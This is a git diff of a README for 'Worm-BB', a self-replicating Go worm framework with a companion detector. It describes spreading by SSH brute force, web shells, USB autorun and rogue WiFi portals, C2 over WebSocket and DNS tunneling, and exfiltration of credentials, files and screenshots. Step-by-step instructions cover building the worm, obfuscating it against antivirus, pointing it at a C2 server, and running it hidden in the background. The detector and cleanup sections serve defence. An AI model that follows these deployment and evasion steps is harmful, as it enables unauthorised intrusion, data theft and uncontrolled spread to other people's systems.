Update README.md

README.md

@@ -1,3 +1,261 @@
 # wormBB
 
-Self Replicating Linux Worm
+Self Replicating Linux Worm# Worm-BB: Advanced Self-Replicating Framework for Red & Blue Teams
+
+![ek0ms Banner](https://img.shields.io/badge/ek0ms-certified_ethcial_hacker-black)
+
+
+
+**Educational Purpose Only**
+
+Worm-BB is a research-grade, multi-platform worm framework written in Go. It demonstrates modern autonomous propagation techniques, stealth command & control, USB and WiFi-based spreading, web shell persistence, and data exfiltration. The companion detection and removal tool helps blue teams identify and eradicate Worm-BB infections in authorized environments.
+
+**This repository is for authorized security testing, research, and defense training only.** 
+---
+
+## Overview
+
+Worm-BB implements the classic worm trinity: **Scan → Exploit → Replicate**. It spreads across networks, USB drives, and rogue WiFi access points, establishes deep persistence on Windows and Linux, and communicates with a C2 server via WebSockets, DNS tunneling, and HTTP beacons. The detector tool (`worm_bb_detector`) scans for all known Worm-BB artifacts – processes, files, registry keys, scheduled tasks, cron jobs, systemd services, WMI subscriptions, USB autorun files, and network multicast traffic.
+
+Both components are written entirely in Go, making them cross‑platform, statically linked, and difficult to detect by signature‑based AVs (when compiled with obfuscation).
+
+---
+
+## Capabilities
+
+### Worm Framework (`worm.go`)
+
+| Module               | Description |
+|----------------------|-------------|
+| **SSH Bruteforce**   | Default credential list (`root:root`, `admin:admin`, etc.) + payload deployment. |
+| **SMB/EternalBlue**  | Detection of port 445; exploit hooks ready. |
+| **WebShell**         | Uploads PHP/ASP/Python shells via PUT, POST, FTP, WebDAV; backdoor deployment. |
+| **USB Propagation**  | Monitors removable drives, copies worm, creates `autorun.inf` (Windows) or udev rules (Linux), hides files. |
+| **WiFi Evil Portal** | Rogue AP with DNS spoofing, captive portal, deauth attack; forces worm download. |
+| **P2P Coordination** | Multicast peer discovery (`239.255.42.42:4242`), leader election, population management. |
+| **C2 Channels**      | WebSocket (WSS), DNS tunneling (A/TXT queries), HTTP/S beacons with random User-Agent. |
+| **Data Exfiltration**| Batched, AES‑encrypted exfil to MySQL or HTTPS endpoint; steals creds, files, screenshots. |
+| **Persistence**      | Windows: Run keys, scheduled tasks, WMI, startup folder. Linux: crontab, systemd, SSH keys, udev. |
+
+### Detection & Removal Tool (`worm_bb_detector.go`)
+
+| Scan Type            | Detects                                                                 |
+|----------------------|-------------------------------------------------------------------------|
+| Processes            | Names `system-update`, `SystemUpdate`, `worm_bb`, suspicious cmdline.   |
+| Filesystem           | Known worm paths, temp directories, USB autorun files.                  |
+| Registry (Windows)   | Run keys containing `SystemUpdate`.                                     |
+| Scheduled Tasks      | `SystemUpdateTask`, `SystemUpdateTask_startup`.                         |
+| WMI (Windows)        | `__EventFilter` named `SystemUpdateFilter`.                             |
+| Cron (Linux)         | `@reboot /tmp/system-update`, `*/30 * * * * /tmp/system-update`.        |
+| Systemd (Linux)      | `system-update.service`.                                                |
+| udev (Linux)         | `99-usb-autorun.rules`.                                                 |
+| SSH Keys             | `authorized_keys` containing `worm-bb-key`.                             |
+| USB Drives           | `autorun.inf`, `SystemUpdate.exe`, `.lnk` files.                        |
+| Network              | Multicast listener on `239.255.42.42:4242`, listening ports 4242–8443.  |
+| Memory (basic)       | Loaded module strings on Windows (`tasklist /M`).                       |
+
+Remediation actions are generated for each finding: kill processes, delete files, remove registry keys, clean cron/systemd, purge USB malware, and delete WMI subscriptions. The tool supports interactive (prompt per action) or fully automatic (`--auto`) mode.
+
+---
+
+## Build Instructions
+
+### Prerequisites
+
+- Go 1.16+ (`go version`)
+- Optional dependencies for WiFi module (Linux only):
+  ```bash
+  sudo apt install libnl-3-dev libnl-genl-3-dev libpcap-dev hostapd dnsmasq
+  ```
+- For cross‑compilation to Windows (optional):
+  ```bash
+  sudo apt install gcc-mingw-w64-x86-64
+  ```
+
+### Install Go Dependencies
+
+```bash
+go mod init worm_bb
+```
+
+```bash
+go get -u github.com/google/gousb
+go get -u github.com/gorilla/websocket
+go get -u github.com/miekg/dns
+go get -u github.com/go-sql-driver/mysql
+go get -u golang.org/x/crypto/ssh
+go get -u golang.org/x/sys/windows
+go get -u golang.org/x/sys/windows/registry
+```
+
+### Compile the Worm (`worm.go`)
+
+```bash
+# Linux (x86_64)
+CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb worm.go
+
+# Windows (x86_64) – hide console
+CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc go build -ldflags="-s -w -H=windowsgui" -o worm_bb.exe worm.go
+
+# macOS (Intel)
+CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb_mac worm.go
+
+# ARM (Raspberry Pi)
+CGO_ENABLED=1 GOOS=linux GOARCH=arm GOARM=7 CC=arm-linux-gnueabihf-gcc go build -ldflags="-s -w" -o worm_bb_arm worm.go
+```
+
+### Compile the Detector (`worm_bb_detector.go`)
+
+```bash
+# Linux
+go build -ldflags="-s -w" -o worm_bb_detector worm_bb_detector.go
+
+# Windows
+GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb_detector.exe worm_bb_detector.go
+
+# macOS
+GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb_detector_mac worm_bb_detector.go
+```
+
+### Obfuscation (Optional, Lowers Detection Rate)
+
+```bash
+go install mvdan.cc/garble@latest
+garble -literals -tiny -seed=random build -ldflags="-s -w" -o worm_bb_obf worm.go
+```
+
+---
+
+## Usage – Worm Framework
+
+**Before you run:** Change the C2 constants in `worm.go` to point to your own infrastructure (WebSocket, DNS domain, exfil endpoint). 
+
+```go
+const (
+    C2_WEBSOCKET = "wss://your-c2.com:8443/ws"
+    C2_DNS_DOMAIN = "your-c2.com"
+    DATA_EXFIL_SERVER = "https://your-c2.com:8443/upload"
+)
+```
+
+### Run the Worm
+
+```bash
+# Linux – background, no output
+./worm_bb > /dev/null 2>&1 &
+
+# Windows – hidden (compiled with -H=windowsgui)
+worm_bb.exe
+
+# Manual execution with output (for debugging)
+./worm_bb
+```
+
+On first run, the worm:
+1. Checks for existing instances (mutex, lock file, listening ports).
+2. Installs persistence (registry, crontab, systemd, etc.).
+3. Joins the P2P multicast group.
+4. Begins scanning and propagating.
+
+### Behaviour Tuning
+
+The worm automatically selects a propagation strategy based on local population:
+- `FULL_INSTALL` – no other worms → aggressive scanning.
+- `SUPPLEMENT_PROPAGATION` – few worms → fill gaps.
+- `COORDINATED_SCAN` – many worms → leader distributes tasks.
+- `EXPAND_NETWORK` – current network saturated → random /24 scans.
+- `STEALTH_MODE` – high density → one host per 5 minutes.
+
+### Cleanup
+
+To remove the worm after testing, either run the detection tool (see next section) or manually delete:
+
+```bash
+# Linux
+pkill -f system-update
+rm -f /tmp/system-update /etc/systemd/system/system-update.service
+crontab -l | grep -v system-update | crontab -
+rm -f /etc/udev/rules.d/99-usb-autorun.rules
+
+# Windows
+taskkill /F /IM SystemUpdate.exe
+schtasks /delete /tn SystemUpdateTask /f
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /f
+del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.exe"
+```
+
+---
+
+## Usage – Detection & Removal Tool
+
+The detector scans for all Worm-BB indicators and optionally removes them.
+
+### Basic Scan (Interactive)
+
+```bash
+# Linux (run as root for full coverage)
+sudo ./worm_bb_detector
+
+# Windows (run as Administrator)
+worm_bb_detector.exe
+```
+
+You will be prompted before each remediation action.
+
+### Fully Automatic Scan & Clean
+
+```bash
+sudo ./worm_bb_detector --auto --network
+```
+
+- `--auto` – automatically executes all remediations without prompting.
+- `--network` – enables multicast listener test and port scanning.
+
+### Save JSON Report
+
+```bash
+sudo ./worm_bb_detector --output scan_report.json
+```
+
+### Example Output
+
+```
+================================================
+WORM-BB DETECTION AND REMOVAL TOOL
+Version: 1.0
+================================================
+[*] Scanning for worm processes...
+[*] Scanning for worm files...
+[!] WORM DETECTED! Severity: HIGH
+[!] Found 4 indicators
+...
+[?] Remediation: KILL_PROCESS
+    Target: PID 1337
+    Command: kill -9 1337
+    Execute? (y/N): y
+[+] Success: KILL_PROCESS completed
+...
+[+] All remediations completed successfully!
+```
+
+### Exit Codes
+
+| Code | Meaning                     |
+|------|-----------------------------|
+| 0    | No worm detected            |
+| 1    | Worm detected and remediated|
+
+---
+
+## Ethical & Legal Disclaimer
+
+**This software is provided for educational and authorized security testing only.**
+
+
+# Read my wormBB research, walk thru and articles here:
+
+https://churchofmalware.org
+
+https://medium.com/@ekoms1/the-fascinating-world-of-self-replicating-worms-0e6ad768a001
+
+https://substack.com/@ek0mssavi0r/p-193527720